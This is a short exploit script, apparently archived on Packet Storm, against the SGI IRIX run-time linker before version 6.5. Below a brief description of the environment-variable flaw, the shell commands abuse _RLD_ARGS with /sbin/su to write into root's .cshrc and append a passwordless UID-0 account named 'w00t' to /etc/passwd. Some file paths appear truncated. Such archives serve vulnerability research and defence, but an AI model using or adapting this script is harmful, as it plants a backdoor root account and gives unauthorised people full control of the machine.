SGI IRIX 6.4.x Run-Time Linker Arbitrary File Creation

Type packetstorm
Reporter Hacker Fantastic
Modified 2019-04-28T00:00:00


# SGI IRIX <= 6.4.x run-time linker (rld) arbitrary file creation exploit  
# =======================================================================  
# The IRIX run-time linker on all versions prior to 6.5 does not properly  
# scrub environment variables when executing binaries with privilege or  
# capabilities. A malicious user can leverage this to create files as the  
# "root" user and partially control the contents.   
# -- HackerFantastic (  
echo "echo w00t::0:0:greetz:/:/bin/csh >> /etc/passwd" > /tmp/  
chmod 755 /tmp/  
_RLD_ARGS="-log /.cshrc |/tmp/" /sbin/su  
last -3 root  
echo "[ waiting 5mins for root to login..."  
sleep 300  
su - w00t